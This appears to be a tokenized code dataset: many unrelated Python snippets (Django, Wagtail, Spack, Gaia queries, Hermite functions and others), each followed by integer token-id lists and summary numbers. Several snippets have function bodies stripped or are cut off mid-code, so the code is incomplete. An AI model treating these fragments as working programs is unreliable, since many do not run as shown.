27586,
796,
657,
... | 2.976471 | 170 |
'''
File: 110.py
File Created: 2021-01-12 13:48:32 -08:00
Author: Taowyoo (caoyxsh@outlook.com)
Brief: https://leetcode.com/problems/balanced-binary-tree/
-----
Last Modified: 2021-01-12 13:48:41 -08:00
Modified By: Taowyoo (caoyxsh@outlook.com>)
-----
Copyright 2020 - 2021
'''
# Definition for a binary tree node.
# class TreeNode:
# def __init__(self, val=0, left=None, right=None):
# self.val = val
# self.left = left
# self.right = right
class Solution:
"""Recursive Solution
"""
class Solution(object):
"""Itrative Solution
Args:
object ([type]): [description]
""" | [
7061,
6,
198,
8979,
25,
9796,
13,
9078,
198,
8979,
15622,
25,
33448,
12,
486,
12,
1065,
1511,
25,
2780,
25,
2624,
532,
2919,
25,
405,
198,
13838,
25,
11940,
322,
88,
2238,
357,
6888,
726,
87,
1477,
31,
448,
5460,
13,
785,
8,
198... | 2.417625 | 261 |
#hardware platform: pyboard V1.1
import pyb
import ssd1306
i2c=pyb.I2C(1,pyb.I2C.MASTER,baudrate=100000) #Init i2c
lcd=ssd1306.SSD1306_I2C(128,64,i2c) #create LCD object,Specify width and height
lcd.text("DFRobot",0,0) #set "DFRobot" at (0,0)
lcd.text("chengdu",24,16) #set "chengdu" at (24,16)
lcd.text("123456",64,24) #set "123456" at (64,24)
lcd.show() #display | [
2,
10424,
1574,
3859,
25,
12972,
3526,
569,
16,
13,
16,
198,
198,
11748,
12972,
65,
198,
11748,
264,
21282,
12952,
21,
198,
198,
72,
17,
66,
28,
9078,
65,
13,
40,
17,
34,
7,
16,
11,
9078,
65,
13,
40,
17,
34,
13,
31180,
5781,
... | 1.609272 | 302 |
# 223000000
sm.warp(220000000, 26)
| [
2,
30299,
10535,
198,
5796,
13,
86,
5117,
7,
1828,
24598,
11,
2608,
8,
198
] | 2.333333 | 15 |
# Generated by Django 3.2.5 on 2021-07-10 22:36
from django.db import migrations, models
import django.utils.timezone
| [
2,
2980,
515,
416,
37770,
513,
13,
17,
13,
20,
319,
33448,
12,
2998,
12,
940,
2534,
25,
2623,
198,
198,
6738,
42625,
14208,
13,
9945,
1330,
15720,
602,
11,
4981,
198,
11748,
42625,
14208,
13,
26791,
13,
2435,
11340,
628
] | 2.926829 | 41 |
from selenium.webdriver import Chrome
from selenium.webdriver import ChromeOptions
from selenium.webdriver.chrome.service import Service
from selenium.webdriver.common.by import By
from webdriver_manager.chrome import ChromeDriverManager
if __name__ == '__main__':
main()
| [
6738,
384,
11925,
1505,
13,
12384,
26230,
1330,
13282,
198,
6738,
384,
11925,
1505,
13,
12384,
26230,
1330,
13282,
29046,
198,
6738,
384,
11925,
1505,
13,
12384,
26230,
13,
46659,
13,
15271,
1330,
4809,
198,
6738,
384,
11925,
1505,
13,
... | 3.481481 | 81 |
from to_send_a_fax import E, f
import unittest
if __name__ == '__main__':
unittest.main()
| [
6738,
284,
62,
21280,
62,
64,
62,
23560,
1330,
412,
11,
277,
198,
11748,
555,
715,
395,
198,
198,
361,
11593,
3672,
834,
6624,
705,
834,
12417,
834,
10354,
198,
220,
220,
220,
555,
715,
395,
13,
12417,
3419,
198
] | 2.375 | 40 |
import json
from utils.os_utils import create_python_files, create_results_dir
from utils.strings_util import snake_case_to_camel_case
| [
11748,
33918,
198,
198,
6738,
3384,
4487,
13,
418,
62,
26791,
1330,
2251,
62,
29412,
62,
16624,
11,
2251,
62,
43420,
62,
15908,
198,
6738,
3384,
4487,
13,
37336,
62,
22602,
1330,
17522,
62,
7442,
62,
1462,
62,
66,
17983,
62,
7442,
6... | 3.111111 | 45 |
from __future__ import absolute_import, unicode_literals
from django.conf import settings
from django.contrib.auth.views import redirect_to_login
from django.core.urlresolvers import reverse
from wagtail.utils.compat import user_is_authenticated
from wagtail.wagtailcore import hooks
from wagtail.wagtailcore.models import PageViewRestriction
@hooks.register('before_serve_page')
def check_view_restrictions(page, request, serve_args, serve_kwargs):
"""
Check whether there are any view restrictions on this page which are
not fulfilled by the given request object. If there are, return an
HttpResponse that will notify the user of that restriction (and possibly
include a password / login form that will allow them to proceed). If
there are no such restrictions, return None
"""
restrictions = page.get_view_restrictions()
if restrictions:
passed_restrictions = request.session.get('passed_page_view_restrictions', [])
for restriction in restrictions:
if restriction.restriction_type == PageViewRestriction.PASSWORD:
if restriction.id not in passed_restrictions:
from wagtail.wagtailcore.forms import PasswordPageViewRestrictionForm
form = PasswordPageViewRestrictionForm(instance=restriction,
initial={'return_url': request.get_full_path()})
action_url = reverse('wagtailcore_authenticate_with_password', args=[restriction.id, page.id])
return page.serve_password_required_response(request, form, action_url)
elif restriction.restriction_type == PageViewRestriction.LOGIN:
if not user_is_authenticated(request.user):
return require_wagtail_login(next=request.get_full_path())
elif restriction.restriction_type == PageViewRestriction.GROUPS:
if not request.user.is_superuser:
current_user_groups = request.user.groups.all()
if not any(group in current_user_groups for group in restriction.groups.all()):
return require_wagtail_login(next=request.get_full_path())
| [
6738,
11593,
37443,
834,
1330,
4112,
62,
11748,
11,
28000,
1098,
62,
17201,
874,
198,
198,
6738,
42625,
14208,
13,
10414,
1330,
6460,
198,
6738,
42625,
14208,
13,
3642,
822,
13,
18439,
13,
33571,
1330,
18941,
62,
1462,
62,
38235,
198,
... | 2.575058 | 866 |
# Copyright 2013-2020 Lawrence Livermore National Security, LLC and other
# Spack Project Developers. See the top-level COPYRIGHT file for details.
#
# SPDX-License-Identifier: (Apache-2.0 OR MIT)
from spack import *
import platform
class Vecgeom(CMakePackage):
"""The vectorized geometry library for particle-detector simulation
(toolkits)."""
homepage = "https://gitlab.cern.ch/VecGeom/VecGeom"
url = "https://gitlab.cern.ch/api/v4/projects/VecGeom%2FVecGeom/repository/archive.tar.gz?sha=v0.3.rc"
version('01.01.03', git='https://gitlab.cern.ch/VecGeom/VecGeom.git', tag='v01.01.03', preferred=True)
version('01.00.00', git='https://gitlab.cern.ch/VecGeom/VecGeom.git', tag='v01.00.00')
version('00.05.00', git='https://gitlab.cern.ch/VecGeom/VecGeom.git', tag='v00.05.00')
version('0.3.rc', sha256='a87a9ea4ab126b59ff9c79182bc0911ead3d76dd197194742e2a35ccd341299d')
variant('cxxstd',
default='17',
values=('11', '14', '17'),
multi=False,
description='Use the specified C++ standard when building.')
variant('vector',
default='native',
values=('sse3', 'sse4.2', 'native'),
multi=False,
description='Specify the instruction set for vectorization.')
depends_on('cmake@3.5:', type='build')
| [
2,
15069,
2211,
12,
42334,
13914,
45036,
3549,
2351,
4765,
11,
11419,
290,
584,
198,
2,
1338,
441,
4935,
34152,
13,
4091,
262,
1353,
12,
5715,
27975,
38162,
9947,
2393,
329,
3307,
13,
198,
2,
198,
2,
30628,
55,
12,
34156,
12,
33234,... | 2.326957 | 575 |
# This module is in charge of managing files
import csv
import json
from pathlib import Path
import os
home = Path(__file__).parents[0]
#write configuration information
| [
2,
770,
8265,
318,
287,
3877,
286,
11149,
3696,
198,
11748,
269,
21370,
198,
11748,
33918,
198,
6738,
3108,
8019,
1330,
10644,
198,
11748,
28686,
198,
198,
11195,
796,
10644,
7,
834,
7753,
834,
737,
23743,
58,
15,
60,
628,
198,
2,
1... | 3.73913 | 46 |
"""Redirecting writing
If using a library that can print messages to the console, editing the library
by replacing `print()` with `tqdm.write()` may not be desirable.
In that case, redirecting `sys.stdout` to `tqdm.write()` is an option.
To redirect `sys.stdout`, create a file-like class that will write
any input string to `tqdm.write()`, and supply the arguments
`file=sys.stdout, dynamic_ncols=True`.
A reusable canonical example is given below:
"""
from __future__ import print_function
from time import sleep
import contextlib
import sys
from tqdm import tqdm
class DummyTqdmFile(object):
"""Dummy file-like that will write to tqdm"""
file = None
@contextlib.contextmanager
# Redirect stdout to tqdm.write() (don't forget the `as save_stdout`)
with stdout_redirect_to_tqdm() as save_stdout:
# tqdm call need to specify sys.stdout, not sys.stderr (default)
# and dynamic_ncols=True to autodetect console width
for _ in tqdm(range(3), file=save_stdout, dynamic_ncols=True):
blabla()
sleep(.5)
# After the `with`, printing is restored
print('Done!')
| [
37811,
7738,
1060,
278,
3597,
198,
198,
1532,
1262,
257,
5888,
326,
460,
3601,
6218,
284,
262,
8624,
11,
12857,
262,
5888,
198,
1525,
220,
13586,
4600,
4798,
3419,
63,
351,
4600,
83,
80,
36020,
13,
13564,
3419,
63,
743,
407,
307,
18... | 2.920424 | 377 |
"""Here is a thing""" | [
37811,
4342,
318,
257,
1517,
37811
] | 3.5 | 6 |
import numpy as np
from scipy.special import eval_hermite, factorial
def hermite_functions(n, x, all_n=True, move_axes=(), method="recursive"):
"""
Calculate the Hermite functions up to the nth order at position x, psi_n(x).
For details see:
https://en.wikipedia.org/wiki/Hermite_polynomials#Hermite_functions
If all_n == True, then return all Hermite functions up to n
If all_n == False, only return nth Hermite function
If using recursive method, then the latter is more memory efficient as it
only stores psi_n, psi_{n-1}, and psi_{n-2}
The 'move_axes' option causes the output dimensions to be swapped around
using np.moveaxis.
Uses one of three possible calculation methods:
'recursive' - Uses recursive method. Most efficient for n > 5.
'direct' - Calculates directly using Hermite polynomials.
Inefficient due to factorial and Hermite polynomial,
although useful for comparison when testing
'analytic' - Uses analytic expressions (only for n <= 5)
Recursion relation:
psi_n(x) = sqrt(2/n) * x * psi_{n-1}(x) - sqrt((n-1)/n) * psi_{n-2}(x)
Examples:
>>> x = np.mgrid[-2:3, 0:4]
>>> x.shape
(2, 5, 4)
>>> n = 5
>>> psi = hermite_functions(n, x, all_n=False)
>>> psi.shape
(2, 5, 4)
>>> psi = hermite_functions(n, x, all_n=True)
>>> psi.shape
(6, 2, 5, 4)
>>> reshape = ([0, 1, 2, 3], [1, 3, 2, 0])
>>> psi = hermite_functions(n, x, all_n=True, move_axes=reshape)
>>> psi.shape
(4, 6, 5, 2)
"""
if method not in ["recursive", "analytic", "direct"]:
raise ValueError("Method not recognized.")
if not (issubclass(type(n), int) or issubclass(type(n), np.integer)):
raise TypeError("n must be an integer.")
if n < 0:
raise ValueError("n must be non-negative.")
if method == "analytic" and (n > 5):
raise ValueError("n must not be greater than 5 for analytic calculation.")
if all_n:
psi_n = _Hermite_all_n(n, x, method)
else:
psi_n = _Hermite_single_n(n, x, method)
if move_axes:
psi_n = np.moveaxis(psi_n, move_axes[0], move_axes[1])
return psi_n
def _Hermite_single_n(n, x, method):
"""
Calculates psi_n(x) for a single value of n.
"""
if method == "analytic":
return _H_analytic(n, x)
if method == "direct":
return _H_direct(n, x)
psi_m_minus_2 = _H_analytic(0, x)
if n == 0:
return psi_m_minus_2
psi_m_minus_1 = _H_analytic(1, x)
if n == 1:
return psi_m_minus_1
for m in range(2, n + 1):
psi_m = _H_recursive(m, x, psi_m_minus_2, psi_m_minus_1)
psi_m_minus_2 = psi_m_minus_1
psi_m_minus_1 = psi_m
return psi_m
def _Hermite_all_n(n, x, method):
"""
Calcualtes psi_m(x) for all 0 <= m <= n.
"""
try:
psi_n = np.zeros((n + 1,) + x.shape)
except AttributeError: # x does not have property 'shape'
psi_n = np.zeros((n + 1, 1))
if method == "analytic":
for m in range(n + 1):
psi_n[m, :] = _H_analytic(m, x)
return psi_n
if method == "direct":
for m in range(n + 1):
psi_n[m, :] = _H_direct(m, x)
return psi_n
psi_n[0, :] = _H_analytic(0, x)
if n == 0:
return psi_n
psi_n[1, :] = _H_analytic(1, x)
if n == 1:
return psi_n
for m in range(2, n + 1):
psi_n[m, :] = _H_recursive(m, x, psi_n[m - 2, :], psi_n[m - 1, :])
return psi_n
def _H_recursive(m, x, psi_m_minus_2, psi_m_minus_1):
"""
Calculate psi_m(x) using recursion relation.
"""
return np.sqrt(2 / m) * x * psi_m_minus_1 - np.sqrt((m - 1) / m) * psi_m_minus_2
def _H_analytic(n, x):
"""
Analytic expressions for psi_n(x) for 0 <= n <= 5.
"""
if n == 0:
return np.pi ** (-1 / 4) * np.exp(-(x ** 2) / 2)
if n == 1:
return np.sqrt(2) * np.pi ** (-1 / 4) * x * np.exp(-(x ** 2) / 2)
if n == 2:
return (
(np.sqrt(2) * np.pi ** (1 / 4)) ** (-1)
* (2 * x ** 2 - 1)
* np.exp(-(x ** 2) / 2)
)
if n == 3:
return (
(np.sqrt(3) * np.pi ** (1 / 4)) ** (-1)
* (2 * x ** 3 - 3 * x)
* np.exp(-(x ** 2) / 2)
)
if n == 4:
return (
(2 * np.sqrt(6) * np.pi ** (1 / 4)) ** (-1)
* (4 * x ** 4 - 12 * x ** 2 + 3)
* np.exp(-(x ** 2) / 2)
)
if n == 5:
return (
(2 * np.sqrt(15) * np.pi ** (1 / 4)) ** (-1)
* (4 * x ** 5 - 20 * x ** 3 + 15 * x)
* np.exp(-(x ** 2) / 2)
)
raise ValueError("n must be an integer between 0 and 5")
def _H_direct(n, x):
"""
Calculate psi_n(x) using explicit definition.
"""
return (
1
/ np.sqrt(2 ** n * factorial(n))
* np.pi ** (-1 / 4)
* np.exp(-(x ** 2) / 2)
* eval_hermite(n, x)
)
if __name__ == "__main__":
import doctest
doctest.testmod()
| [
11748,
299,
32152,
355,
45941,
198,
6738,
629,
541,
88,
13,
20887,
1330,
5418,
62,
372,
32937,
11,
1109,
5132,
628,
198,
4299,
607,
32937,
62,
12543,
2733,
7,
77,
11,
2124,
11,
477,
62,
77,
28,
17821,
11,
1445,
62,
897,
274,
16193... | 2.022117 | 2,532 |
'''
SYNBIOCHEM-DB (c) University of Manchester 2015
SYNBIOCHEM-DB is licensed under the MIT License.
To view a copy of this license, visit <http://opensource.org/licenses/MIT/>.
@author: neilswainston
'''
from sbcdb.enzyme_utils import EnzymeManager
class ReactionManager(object):
'''Class to implement a manager of Reaction data.'''
def __init__(self):
'''Constructor.'''
self.__nodes = {}
self.__reac_ids = {}
self.__reac_enz_rels = []
self.__org_enz_rels = []
self.__enz_man = EnzymeManager()
def write_files(self, writer):
'''Write neo4j import files.'''
return ([writer.write_nodes(self.__nodes.values(),
'Reaction'),
writer.write_nodes(self.__enz_man.get_nodes(),
'Enzyme')],
[writer.write_rels(self.__reac_enz_rels,
'Reaction', 'Enzyme'),
writer.write_rels(self.__enz_man.get_org_enz_rels(),
'Organism', 'Enzyme')])
def add_reaction(self, source, reac_id, properties):
'''Adds a reaction to the collection of nodes, ensuring uniqueness.'''
reac_id = self.__reac_ids[source + reac_id] \
if source + reac_id in self.__reac_ids else reac_id
if reac_id not in self.__nodes:
properties[':LABEL'] = 'Reaction'
properties['id:ID(Reaction)'] = reac_id
properties['source'] = source
properties[source] = reac_id
self.__nodes[reac_id] = properties
if 'mnx' in properties:
self.__reac_ids['mnx' + properties['mnx']] = reac_id
if 'kegg.reaction' in properties:
self.__reac_ids[
'kegg.reaction' + properties['kegg.reaction']] = reac_id
if 'rhea' in properties:
self.__reac_ids['rhea' + properties['rhea']] = reac_id
else:
self.__nodes[reac_id].update(properties)
return reac_id
def add_react_to_enz(self, data, source, num_threads=0):
'''Submit data to the graph.'''
# Create Reaction and Enzyme nodes:
enzyme_ids = self.__create_react_enz(data, source)
# Create Enzyme nodes:
self.__enz_man.add_uniprot_data(enzyme_ids, source, num_threads)
def __create_react_enz(self, data, source):
'''Creates Reaction and Enzyme nodes and their Relationships.'''
enzyme_ids = []
for reac_id, uniprot_ids in data.iteritems():
reac_id = self.add_reaction(source, reac_id, {})
for uniprot_id in uniprot_ids:
enzyme_ids.append(uniprot_id)
self.__reac_enz_rels.append([reac_id, 'catalysed_by',
uniprot_id,
{'source': source}])
return list(set(enzyme_ids))
| [
7061,
6,
198,
23060,
45,
3483,
46,
3398,
3620,
12,
11012,
357,
66,
8,
2059,
286,
9502,
1853,
198,
198,
23060,
45,
3483,
46,
3398,
3620,
12,
11012,
318,
11971,
739,
262,
17168,
13789,
13,
198,
198,
2514,
1570,
257,
4866,
286,
428,
... | 1.961159 | 1,519 |
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""Contains AS_Rank_V2 which parses AS Rank data using the Restful API
In contrast to the previous parser this also gets organization, rank,
and links to other ASNs"""
__author__ = "Nicholas Shpetner"
__credits__ = ["Nicholas Shpetner", "Abhinna Adhikari", "Justin Furuness"]
__Lisence__ = "BSD"
__maintainer__ = "Justin Furuness"
__email__ = "jfuruness@gmail.com"
__status__ = "Production"
import os
import json
import urllib.request
import time
from .tables import AS_Rank_V2
from ...utils import utils
from ...utils.base_classes import Parser
class AS_Rank_Parser_V2(Parser):
"""Parses the AS rank data from https://asrank.caida.org/
"""
__slots__ = []
url_base = 'https://api.asrank.caida.org/v2/restful/'
header_base = {'accept': 'application/json'}
def _run(self, first_rank=None, last_rank=None):
"""Parses the AS rank data from https://asrank.caida.org/
"""
# Clear the table before every run
with AS_Rank_V2(clear=True) as db:
pass
if first_rank is not None and last_rank is not None:
assert last_rank > first_rank
next_page = True
# Defaults
first = 10000
offset = 0
count = 1
final_count = 0
if first_rank is not None:
offset = first_rank
count = first_rank
if last_rank is not None:
if (last_rank - first_rank) < 10000:
first = last_rank - first_rank
rows = []
while(next_page):
url = self.url_base + f"asns/?first={first}&offset={offset}"
req = urllib.request.Request(url, None, self.header_base)
with urllib.request.urlopen(req) as response:
page = response.read()
data = json.loads(page.decode('utf-8'))
asns = data['data']['asns']
for asn in asns['edges']:
node = asn['node']
asn = int(node['asn'])
rank = int(node['rank'])
links = self._get_links(asn)
rows.append([rank, asn, node['asnName'], links])
count += 1
if asns['pageInfo']['hasNextPage'] is False:
next_page = False
final_count = asns['totalCount']
if last_rank is not None:
if count >= last_rank:
next_page = False
final_count = asns['totalCount']
elif (first + count) >= last_rank:
first = last_rank - count + 1
offset = count
path = os.path.join(self.csv_dir, 'as_rank_v2.csv')
utils.rows_to_db(rows, path, AS_Rank_V2, clear_table=False)
return final_count
| [
2,
48443,
14629,
14,
8800,
14,
24330,
21015,
18,
198,
2,
532,
9,
12,
19617,
25,
3384,
69,
12,
23,
532,
9,
12,
198,
198,
37811,
4264,
1299,
7054,
62,
27520,
62,
53,
17,
543,
13544,
274,
7054,
10916,
1366,
1262,
262,
8324,
913,
78... | 2.034067 | 1,409 |
max_theoretical_welfare = 1000000
number_of_citizens = int(input())
total_money_spent = 0
max_welfare = 0
for current_welfare in map(int, input().split()):
total_money_spent += (max_theoretical_welfare - current_welfare)
if current_welfare > max_welfare:
max_welfare = current_welfare
print(total_money_spent - number_of_citizens * (max_theoretical_welfare - max_welfare))
| [
9806,
62,
1169,
9997,
605,
62,
86,
27122,
796,
1802,
2388,
198,
198,
17618,
62,
1659,
62,
46801,
796,
493,
7,
15414,
28955,
198,
198,
23350,
62,
26316,
62,
2777,
298,
796,
657,
198,
9806,
62,
86,
27122,
796,
657,
198,
198,
1640,
1... | 2.655405 | 148 |
# Copyright 2016 GoDaddy.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or
# implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from neutron_lib import constants
import neutron.api.extensions as api_ext
import neutron.common.config as config
import neutron.extensions
import neutron.services.network_ip_availability.plugin as plugin_module
import neutron.tests.unit.db.test_db_base_plugin_v2 as test_db_base_plugin_v2
API_RESOURCE = 'network-ip-availabilities'
IP_AVAIL_KEY = 'network_ip_availability'
IP_AVAILS_KEY = 'network_ip_availabilities'
EXTENSIONS_PATH = ':'.join(neutron.extensions.__path__)
PLUGIN_NAME = '%s.%s' % (plugin_module.NetworkIPAvailabilityPlugin.__module__,
plugin_module.NetworkIPAvailabilityPlugin.__name__)
| [
2,
15069,
1584,
1514,
48280,
13,
198,
2,
198,
2,
49962,
739,
262,
24843,
13789,
11,
10628,
362,
13,
15,
357,
1169,
366,
34156,
15341,
198,
2,
220,
345,
743,
407,
779,
428,
2393,
2845,
287,
11846,
351,
262,
13789,
13,
198,
2,
220,
... | 3.174935 | 383 |
from django.shortcuts import render, redirect
from .models import Lead, Agent
from .forms import LeadModelForm, LeadForm
from django.views.generic import TemplateView
# The newest implementation supporting model forms
| [
6738,
42625,
14208,
13,
19509,
23779,
1330,
8543,
11,
18941,
198,
6738,
764,
27530,
1330,
20116,
11,
15906,
198,
6738,
764,
23914,
1330,
20116,
17633,
8479,
11,
20116,
8479,
198,
6738,
42625,
14208,
13,
33571,
13,
41357,
1330,
37350,
7680... | 4.326923 | 52 |
#!/usr/bin/env python
# -*- coding: utf-8 -*-
"""
# Visual Studio cl options reference:
# https://msdn.microsoft.com/en-us/library/610ecb4h.aspx
# "Options are specified by either a forward slash (/) or a dash (–)."
# Here we use "-" better than "/" that produces invalid escaped chars using AutoTools.
# -LIBPATH, -D, -I, -ZI and so on.
"""
from conans.tools import unix_path
def architecture_flag(compiler, arch):
"""
returns flags specific to the target architecture and compiler
"""
if not compiler or not arch:
return ""
if str(compiler) in ['gcc', 'apple-clang', 'clang', 'sun-cc']:
if str(arch) in ['x86_64', 'sparcv9']:
return '-m64'
elif str(arch) in ['x86', 'sparc']:
return '-m32'
return ""
def libcxx_flag(compiler, libcxx):
"""
returns flag specific to the target C++ standard library
"""
if not compiler or not libcxx:
return ""
if str(compiler) in ['clang', 'apple-clang']:
if str(libcxx) in ['libstdc++', 'libstdc++11']:
return '-stdlib=libstdc++'
elif str(libcxx) == 'libc++':
return '-stdlib=libc++'
elif str(compiler) == 'sun-cc':
return ({"libCstd": "-library=Cstd",
"libstdcxx": "-library=stdcxx4",
"libstlport": "-library=stlport4",
"libstdc++": "-library=stdcpp"}.get(libcxx, ""))
return ""
def pic_flag(compiler=None):
"""
returns PIC (position independent code) flags, such as -fPIC
"""
if not compiler or compiler == 'Visual Studio':
return ""
return '-fPIC'
def build_type_flag(compiler, build_type):
"""
returns flags specific to the build type (Debug, Release, etc.)
(-s, -g, /Zi, etc.)
"""
if not compiler or not build_type:
return ""
if str(compiler) == 'Visual Studio':
if build_type == 'Debug':
return '-Zi'
else:
if build_type == 'Debug':
return '-g'
elif build_type == 'Release' and str(compiler) == 'gcc':
return '-s'
return ""
def build_type_define(build_type=None):
"""
returns definitions specific to the build type (Debug, Release, etc.)
like DEBUG, _DEBUG, NDEBUG
"""
return 'NDEBUG' if build_type == 'Release' else ""
def adjust_path(path, win_bash=False, subsystem=None, compiler=None):
"""
adjusts path to be safely passed to the compiler command line
for Windows bash, ensures path is in format according to the subsystem
for path with spaces, places double quotes around it
converts slashes to backslashes, or vice versa
"""
if str(compiler) == 'Visual Studio':
path = path.replace('/', '\\')
else:
path = path.replace('\\', '/')
if win_bash:
path = unix_path(path, subsystem)
return '"%s"' % path if ' ' in path else path
include_path_option = "-I"
visual_linker_option_separator = "-link" # Further options will apply to the linker
| [
2,
48443,
14629,
14,
8800,
14,
24330,
21015,
198,
2,
532,
9,
12,
19617,
25,
3384,
69,
12,
23,
532,
9,
12,
198,
198,
37811,
198,
220,
220,
220,
1303,
15612,
11733,
537,
3689,
4941,
25,
198,
220,
220,
220,
1303,
220,
220,
3740,
13... | 2.360305 | 1,310 |
import logging
from pathlib import Path
from typing import Optional
import typer
from . import __app_name__, __version__
from .utils import make_html, resize_image
app = typer.Typer()
logger = logging.getLogger(__name__)
logger.setLevel(logging.DEBUG)
@app.callback()
@app.command()
def image(
image: str = typer.Argument(
str(
Path(__file__)
.parent.parent.joinpath("tests")
.joinpath("fixtures")
.joinpath("xfer-original.jpg")
),
help="Image file location",
),
widths: str = typer.Option("600,1000,1400", help="Widths of new images, in pixels"),
html: bool = typer.Option(True, help="Generate HTML <img> tag"),
classes: str = typer.Option(
None, help='Classnames to add to the <img> tag (e.g. class="img-fluid")'
),
img_sizes: str = typer.Option(
"100vw", help='Sizes for the <img> tag (e.g. sizes="100vw")'
),
lazy: bool = typer.Option(False, help='Adds loading="lazy" to <img> tag for SEO'),
alt: str = typer.Option(
"", help='Adds alt="" to the <img> tag (e.g. alt="Funny image")'
),
dir: str = typer.Option(
None, help='Images directory to prepend to the src (e.g. src="dir/images")'
),
fmt: str = typer.Option(
"webp", help='Image type to save as ("jpg" and "webp" supported)'
),
qual: int = typer.Option(100, help="Compression to apply (i.e. 0=max, 100=min)"),
lower: bool = typer.Option(True, help="Converts filename to lowercase"),
dashes: bool = typer.Option(True, help="Converts underscores to dashes for SEO"),
flask: bool = typer.Option(
False, help="Uses Python Flask's 'url_for('static', ...)'"
),
) -> None:
"""Resize one image"""
typer.secho(f"Image: {image}", fg=typer.colors.GREEN)
typer.echo(f"Widths needed: {widths}")
typer.echo(f"HTML wanted: {html}")
typer.echo(f"Classes wanted: {classes}")
typer.echo(f"Image sizes wanted: {img_sizes}")
typer.echo(f"Lazy loading wanted: {lazy}")
typer.echo(f"Alt text wanted: {alt}")
typer.echo(f"Directory to append: {dir}")
typer.echo(f"Image format wanted: {fmt}")
typer.echo(f"Quality/compression wanted: {qual}")
typer.echo(f"Lowercase filename wanted: {lower}")
typer.echo(f"Dashes wanted: {dashes}")
typer.echo(f"Flask url_for() wanted: {flask}")
widths_split = widths.split(",")
widths_list = [int(width) for width in widths_split]
file = Path(image)
filenames = resize_image(
file=file,
widths=widths_list,
fmt=fmt,
qual=qual,
lower=lower,
dashes=dashes,
)
typer.echo(f"filenames: {filenames}")
if html:
make_html(
orig_img_file=file,
filenames=filenames,
classes=classes,
img_sizes=img_sizes,
lazy=lazy,
alt=alt,
dir=dir,
flask=flask,
)
| [
11748,
18931,
198,
6738,
3108,
8019,
1330,
10644,
198,
6738,
19720,
1330,
32233,
198,
198,
11748,
1259,
525,
198,
198,
6738,
764,
1330,
11593,
1324,
62,
3672,
834,
11,
11593,
9641,
834,
198,
6738,
764,
26791,
1330,
787,
62,
6494,
11,
... | 2.221889 | 1,334 |
# coding: utf-8
import os
from ..crawlable import Crawlable | [
2,
19617,
25,
3384,
69,
12,
23,
198,
198,
11748,
28686,
198,
6738,
11485,
66,
13132,
540,
1330,
327,
13132,
540,
220
] | 2.772727 | 22 |
"""
Collection of utility functions
"""
import numpy as np
import functools
from scipy import sparse
from patsy import dmatrix
from tqdm import tqdm
import pyia
import matplotlib.pyplot as plt
from astropy import units
from astropy.time import Time
from astropy.timeseries import BoxLeastSquares
@functools.lru_cache()
def get_gaia_sources(ras, decs, rads, magnitude_limit=18, epoch=2020, dr=2):
"""
Will find gaia sources using a TAP query, accounting for proper motions.
Inputs have be hashable, e.g. tuples
Parameters
----------
ras : tuple
Tuple with right ascension coordinates to be queried
shape nsources
decs : tuple
Tuple with declination coordinates to be queried
shape nsources
rads : tuple
Tuple with radius query
shape nsources
magnitude_limit : int
Limiting magnitued for query
epoch : float
Year of the observation (Julian year) used for proper motion correction.
dr : int
Gaia Data Release to be used, DR2 or EDR3.
Returns
-------
Pandas DatFrame with number of result sources (rows) and Gaia columns
"""
if not hasattr(ras, "__iter__"):
ras = [ras]
if not hasattr(decs, "__iter__"):
decs = [decs]
if not hasattr(rads, "__iter__"):
rads = [rads]
wheres = [
f"""1=CONTAINS(
POINT('ICRS',ra,dec),
CIRCLE('ICRS',{ra},{dec},{rad}))"""
for ra, dec, rad in zip(ras, decs, rads)
]
where = """\n\tOR """.join(wheres)
if dr == 2:
# CH: We don't need a lot of these columns we could greatly reduce it
gd = pyia.GaiaData.from_query(
f"""SELECT solution_id, designation, source_id, random_index, ref_epoch,
coord1(prop) AS ra, ra_error, coord2(prop) AS dec, dec_error, parallax,
parallax_error, parallax_over_error, pmra, pmra_error, pmdec, pmdec_error,
ra_dec_corr, ra_parallax_corr, ra_pmra_corr, ra_pmdec_corr, dec_parallax_corr,
dec_pmra_corr, dec_pmdec_corr, parallax_pmra_corr, parallax_pmdec_corr,
pmra_pmdec_corr, astrometric_n_obs_al, astrometric_n_obs_ac,
astrometric_n_good_obs_al, astrometric_n_bad_obs_al, astrometric_gof_al,
astrometric_chi2_al, astrometric_excess_noise, astrometric_excess_noise_sig,
astrometric_params_solved, astrometric_primary_flag, astrometric_weight_al,
astrometric_pseudo_colour, astrometric_pseudo_colour_error,
mean_varpi_factor_al, astrometric_matched_observations,
visibility_periods_used, astrometric_sigma5d_max, frame_rotator_object_type,
matched_observations, duplicated_source, phot_g_n_obs, phot_g_mean_flux,
phot_g_mean_flux_error, phot_g_mean_flux_over_error, phot_g_mean_mag,
phot_bp_n_obs, phot_bp_mean_flux, phot_bp_mean_flux_error,
phot_bp_mean_flux_over_error, phot_bp_mean_mag, phot_rp_n_obs,
phot_rp_mean_flux, phot_rp_mean_flux_error, phot_rp_mean_flux_over_error,
phot_rp_mean_mag, phot_bp_rp_excess_factor, phot_proc_mode, bp_rp, bp_g, g_rp,
radial_velocity, radial_velocity_error, rv_nb_transits, rv_template_teff,
rv_template_logg, rv_template_fe_h, phot_variable_flag, l, b, ecl_lon, ecl_lat,
priam_flags, teff_val, teff_percentile_lower, teff_percentile_upper, a_g_val,
a_g_percentile_lower, a_g_percentile_upper, e_bp_min_rp_val,
e_bp_min_rp_percentile_lower, e_bp_min_rp_percentile_upper, flame_flags,
radius_val, radius_percentile_lower, radius_percentile_upper, lum_val,
lum_percentile_lower, lum_percentile_upper, datalink_url, epoch_photometry_url,
ra as ra_gaia, dec as dec_gaia FROM (
SELECT *,
EPOCH_PROP_POS(ra, dec, parallax, pmra, pmdec, 0, ref_epoch, {epoch}) AS prop
FROM gaiadr2.gaia_source
WHERE {where}
) AS subquery
WHERE phot_g_mean_mag<={magnitude_limit}
"""
)
elif dr == 3:
gd = pyia.GaiaData.from_query(
f"""SELECT designation,
coord1(prop) AS ra, ra_error, coord2(prop) AS dec, dec_error,
parallax, parallax_error, pmra, pmra_error, pmdec, pmdec_error,
dr2_radial_velocity, dr2_radial_velocity_error,
ruwe, phot_g_n_obs, phot_g_mean_flux,
